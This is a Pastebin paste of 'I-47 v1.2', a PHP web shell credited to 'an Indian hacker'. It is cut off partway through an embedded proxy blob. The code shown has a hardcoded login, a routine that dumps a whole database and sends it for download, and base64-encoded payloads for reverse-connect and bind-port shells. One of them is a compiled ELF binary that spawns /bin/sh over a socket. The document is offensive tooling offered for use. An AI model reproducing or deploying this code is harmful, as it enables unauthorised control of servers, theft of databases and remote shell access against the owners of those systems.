EddieKidiw

I-47 v1.2 Coded By Arjun decoder By Eddie kidiw

Dec 2nd, 2015
511
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 203.04 KB | None | 0 0
  1. <?php
  2. //========================================//
  3. //========+++I-47 v1.2+++==========//
  4. //========================================//
  5. //====+++Coded By Arjun+++===//
  6. //========================================//
  7. //=====+++An Indian Hacker+++=====//
  8. //========================================//
  9.  
  10. // Set Username & Password
  11. $user = "bondz";
  12. $pass = "300399";
  13.  
  14. @set_magic_quotes_runtime(0);
  15. ob_start();
  16. error_reporting(0);
  17. @set_time_limit(0);
  18. @ini_set('max_execution_time',0);
  19. @ini_set('output_buffering',0);
  20.  
  21. // Dump Database
  22.  
  23. if($_GET["action"] == "dumpDB")
  24. {
  25. $self=$_SERVER["PHP_SELF"];
  26. if(isset($_COOKIE['dbserver']))
  27. {
  28. $date = date("Y-m-d");
  29. $dbserver = $_COOKIE["dbserver"];
  30. $dbuser = $_COOKIE["dbuser"];
  31. $dbpass = $_COOKIE["dbpass"];
  32. $dbname = $_GET['dbname'];
  33. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  34.  
  35. $file = "Dump-$dbname-$date";
  36.  
  37. $file="Dump-$dbname-$date.sql.gz";
  38. $fp = gzopen($file,"w");
  39.  
  40. function write($data)
  41. {
  42. global $fp;
  43.  
  44. fwrite($fp,$data);
  45.  
  46. }
  47. mysql_connect ($dbserver, $dbuser, $dbpass);
  48. mysql_select_db($dbname);
  49. $tables = mysql_query ("SHOW TABLES");
  50. while ($i = mysql_fetch_array($tables))
  51. {
  52. $i = $i['Tables_in_'.$dbname];
  53. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  54. write($create['Create Table'].";\n\n");
  55. $sql = mysql_query ("SELECT * FROM ".$i);
  56. if (mysql_num_rows($sql)) {
  57. while ($row = mysql_fetch_row($sql)) {
  58. foreach ($row as $j => $k) {
  59. $row[$j] = "'".mysql_escape_string($k)."'";
  60. }
  61. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  62. }
  63. }
  64. }
  65.  
  66. fclose ($fp);
  67.  
  68. header("Content-Disposition: attachment; filename=" . $file);
  69. header("Content-Type: application/download");
  70. header("Content-Length: " . filesize($file));
  71. flush();
  72.  
  73. $fp = fopen($file, "r");
  74. while (!feof($fp))
  75. {
  76. echo fread($fp, 65536);
  77. flush();
  78. }
  79. fclose($fp);
  80. }
  81. }
  82.  
  83. $back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+DxBCJRcyD7AiLRQyDwASD7AT/MOgI/v//g8QIicOLRQyDwAiD7AT/MOjz/f//g8QIjQQDQFCLRQyDwAT/MOgu/v//g8QQg+wEagZqAWoC6G3+//+DxBCJReSD7ARqEI1FyFD/deToRv7//4PEEIXAeRqD7AxoCYkECOhy/f//g8QQg+wMagDo9f3//4PsCItFDP8wjUWoUOjE/f//g8QQg+wMjUWoUOhV/f//g8QQg+wIagD/deTolf3//4PEEIPsCGoB/3Xk6IX9//+DxBCD7AhqAv915Oh1/f//g8QQg+wEagBoF4kECGgdiQQI6N78//+DxBCD7Az/deTo4Pz//4PEEI1l9FteX8nDkFWJ5VdWU4PsDOgAAAAAW4HD6hEAAOiC/P//jYMg////jZMg////iUXwKdAx9sH4AjnGcxaJ14n2/xSyi03wKflGwfkCOc6J+nLug8QMW15fycOJ9lWJ5VdWU+gAAAAAW4HDmREAAI2DIP///427IP///yn4wfgCg+wMjXD/6wWQ/xS3ToP+/3X36C4AAACDxAxbXl/Jw5CQVYnlU1K7LJkECKEsmQQI6wqNdgCD6wT/0IsDg/j/dfRYW8nDVYnlU+gAAAAAW4HDMxEAAFDoOv3//1lbycMAAAMAAAABAAIAcm0gLWYgAAAAAAAAAAAAAAAAAAAAWy1dIGNvbm5lY3QoKQBzaCAtaQAvYmluL3NoAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAEAAAAkAAAADAAAALCEBAgNAAAA0IgECAQAAABIgQQIBQAAACSDBAgGAAAA5IEECAoAAAC8AAAACwAAABAAAAAVAAAAAAAAAAMAAAAMmgQIAgAAAIAAAAAUAAAAEQAAABcAAAAwhAQIEQAAACiEBAgSAAAACAAAABMAAAAIAAAA/v//bwiEBAj///9vAQAAAPD//2/ggwQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECZBAgAAAAAAAAAAN6EBAjuhAQI/oQECA6FBAgehQQILoUECD6FBAhOhQQIXoUECG6FBAh+hQQIjoUECJ6FBAiuhQQIvoUECM6FBAgAAAAAAAAAADiZBAgAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAQAAAAIAAAAUgQQIFAEAABMAAAAAAAAAAAAAAAEAAAAAAAAAIwAAAAcAAAACAAAAKIEECCgBAAAgAAAAAAAAAAAAAAAEAAAAAAAAADEAAAAFAAAAAgAAAEiBBAhIAQAAnAAAAAQAAAAAAAAABAAAAAQAAAA3AAAACwAAAAIAAADkgQQI5AEAAEABAAAFAAAAAQAAAAQAAAAQAAAAPwAAAAMAAAACAAAAJIMECCQDAAC8AAAAAAAAAAAAAAABAAAAAAAAAEcAAAD///9vAgAAAOCDBAjgAwAAKAAAAAQAAAAAAAAAAgAAAAIAAABUAAAA/v//bwIAAAAIhAQICAQAACAAAAAFAAAAAQAAAAQAAAAAAAAAYwAAAAkAAAACAAAAKIQECCgEAAAIAAAABAAAAAAAAAAEAAAACAAAAGwAAAAJAAAAAgAAADCEBAgwBAAAgAAAAAQAAAALAAAABAAAAAgAAAB1AAAAAQAAAAYAAACwhAQIsAQAABcAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEAAAAGAAAAyIQECMgEAAAQAQAAAAAAAAAAAAAEAAAABAAAAHsAAAABAAAABgAAANiFBAjYBQAA+AIAAAAAAAAAAAAABAAAAAAAAACBAAAAAQAAAAYAAADQiAQI0AgAABoAAAAAAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAACAAAA7IgECOwIAAA5AAAAAAAAAAAAAAAEAAAAAAAAAI8AAAABAAAAAgAAACiJBAgoCQAABAAAAAAAAAAAAAAABAAAAAAAAACZAAAAAQAAAAMAAAAsmQQILAkAAAgAAAAAAAAAAAAAAAQAAAAAAAAAoAAAAAEAAAADAAAANJkECDQJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAABAAAAAwAAADyZBAg8CQAABAAAAAAAAAAAAAAABAAAAAAAAACsAAAABgAAAAMAAABAmQQIQAkAAMgAAAAFAAAAAAAAAAQAAAAIAAAAtQAAAAEAAAADAAAACJoECAgKAAAEAAAAAAAAAAAAAAAEAAAABAAAALoAAAABAAAAAwAAAAyaBAgMCgAATAAAAAAAAAAAAAAABAAAAAQAAADDAAAAAQAAAAMAAABYmgQIWAoAAAwAAAAAAAAAAAAAAAQAAAAAAAAAyQAAAAgAAAADAAAAZJoECGQKAAAEAAAAAAAAAAAAAAAEAAAAAAAAAM4AAAABAAAAAAAAAAAAAABkCgAADgEAAAAAAAAAAAAAAQAAAAAAAAARAAAAAwAAAAAAAAAAAAAAcgsAANcAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAKwQAABABQAAGwAAACwAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAADsFQAALAMAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEECAAAAAADAAMAAAAAAOSBBAgAAAAAAwAEAAAAAAAkgwQIAAAAAAMABQAAAAAA4IMECAAAAAADAAYAAAAAAAiEBAgAAAAAAwAHAAAAAAAohAQIAAAAAAMACAAAAAAAMIQECAAAAAADAAkAAAAAALCEBAgAAAAAAwAKAAAAAADIhAQIAAAAAAMACwAAAAAA2IUECAAAAAADAAwAAAAAANCIBAgAAAAAAwANAAAAAADsiAQIAAAAAAMADgAAAAAAKIkECAAAAAADAA8AAAAAACyZBAgAAAAAAwAQAAAAAAA0mQQIAAAAAAMAEQAAAAAAPJkECAAAAAADABIAAAAAAECZBAgAAAAAAwATAAAAAAAImgQIAAAAAAMAFAAAAAAADJoECAAAAAADABUAAAAAAFiaBAgAAAAAAwAWAAAAAABkmgQIAAAAAAMAFwAAAAAAAAAAAAAAAAADABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgAAAAAAAAAAAAAAAAADABsAAQAAAPyFBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAALJkECAAAAAABABAAKgAAADSZBAgAAAAAAQARADgAAAA8mQQIAAAAAAEAEgBFAAAAYJoECAAAAAABABYASQAAAGSaBAgBAAAAAQAXAFUAAAAghgQIAAAAAAIADABrAAAAVIYECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAAAwmQQIAAAAAAEAEACEAAAAOJkECAAAAAABABEAkQAAACiJBAgAAAAAAQAPAJ8AAAA8mQQIAAAAAAEAEgCrAAAArIgECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/8gAAAAAAAAAHAEAABIAAADZAAAAQJkECAAAAAARABMA4gAAAAAAAABxAAAAEgAAAPMAAADsiAQIBAAAABEADgD6AAAAAAAAAAsCAAASAAAADAEAACyZBAgAAAAAEALx/x0BAABcmgQIAAAAABECFgAqAQAAaIgECEIAAAASAAwAOgEAAAAAAAB9AAAAEgAAAEwBAACwhAQIAAAAABIACgBSAQAAAAAAAKwBAAASAAAAZAEAANiFBAgAAAAAEgAMAGsBAAAAAAAArwAAABIAAAB9AQAALJkECAAAAAAQAvH/kAEAABSIBAhSAAAAEgAMAKABAAAAAAAAJwAAABIAAAC1AQAAZJoECAAAAAAQAPH/wQEAAICGBAiTAQAAEgAMAMYBAAAAAAAA3QAAABIAAADjAQAALJkECAAAAAAQAvH/9AEAAAAAAAA6AAAAEgAAAAQCAAAAAAAAqgEAABIAAAAWAgAAWJoECAAAAAAgABYAIQIAANCIBAgAAAAAEgANACcCAAAsmQQIAAAAABAC8f87AgAAAAAAADYAAAASAAAATAIAAAAAAADZAAAAEgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
  84.  
  85. $backconnect_perl="pVRdb9owFH1H4j/cptVIJgIETaoESjVGoUXToCLQF4pQIBfwFuzIdtahaf99dmzK2IRWqY6Uj3uOzzm+cXJ5Uc8Fry8JrWfI03IpFwiDUasVsdU3lO1y6UrshcQdqBFCpWAuY7GtaKgzvuuGH9X5sQ3lElmDW5QuwqYHP1VFzck4oRKcqYg32IKrBszumZBzmD0wri5P9Ik6bUNNCILT+1GwguZ1raGOAJpBMwBL+gUmoA1nn/okxfuYJinqiigwNxp1P/cmVXjoLwZDfaMLi2gy7nW+VGGDMuNMsuWexjt0K3KVVTwPGC9C2Mwzfw5TGi9TBMlgjIKl3xF0fBtnxSjF1dFLW8dJwheEFo14nAXzKhCKchFLdqg15t5/rLpG90+rA+/93AYhdFPgQ5Vfc04oVkBxarUaHGzhX60oi5+ploq2mKZwTggTHYvjjkmErXK1TLNw/ybOJVunudi6njZgGVI3mtwOhlVwbt4ZlnMCjaaT6hmoNx7/DdlE4RvGydL8s2Pgf7g2zTjHeI1QlyWqZZ/20OFfc/oaobctzUiZD9V1cLVl4PthGBUFQtcsDH2/Dbne7ODHbc1QE16IU4H8SCOJIbzAt4SrTcD43uDZsyXA0Ul3TKNgXpiNYv8dnvK67I36vwE=";
  86.  
  87.  
  88. $zone="vVRtb9owEP6OxH+4ZhFKWkJg6roqEFS0VStaX1ChmybKB8c5wGpiZ7ZZS6vut8+Gjm5V1r18mPLBuedenrvznV9shQslw4TxsECZVSvVCpt6Wwe983cfxq2Jf1etFJJxDc6lNh+/5E77JyhHUFTq5e6c0CsYH0xgSeZCwDgVegJU5FDidCSuYSTgQmEElhZuBcdGkUFnyDRCxpTuQudCwlucEooSTkmO3e+B8IZpc9xXKy6RnyGGdbbNiQHdmVwUYoO1LEbnIi9grTGiKJB7pO50rLfjG+RAWdYYOqRrzTOh0CNW4SYGVZRkRHorIwtOhfRcEjfbLunEbmKOnR2/Wrl7oLFmY5dYYtPJjQjxVwg/iQVQwkGhLZJfKUjQhEOQWGRLH+5ALRKl5aNbHZp1eO1D7DhtuN80cbwzgYFQ2mTGU/ZIum7QQiH0z6JoKOgV6ijqnx6ObDXKyKagp6qgy/HaGyDKXppKiLvgPJ+oUwdrPRBSW+t9k+JACi1WrpoWjg9CAscbvbn2NbczOBuOIORCs+kyzIlS8BumpwF6lGKhI9gOty/lj3P1oD/HKUqU0b/FDY4Jny3IzI6lDhJZSvFGcI1cB6NlYexIUWSMEs0ED2+Cv2Q1oThS6xvBe8Qi6GXsC5ayml2RQW9miCM4Ebcsy0i422iCZ1asMPRJhm04GfYPYa/RbMNHxlNxreB0BK8aLb805JEZoD9plJshn+l5vD48J10vZbzeqFoqcsJ4K34+0GZEa/ahyEWKcWu/JpEoweO9mpn7nOl4iDxd5er/quvHqyQieEiqtLCBJLOcRMBFQAmdlze0FPwfpW2emBWnLVRl5u69l/b3/hs=";
  89.  
  90. $bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
  91.  
  92. $bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
  93.  
  94. $phpproxy="
  95. 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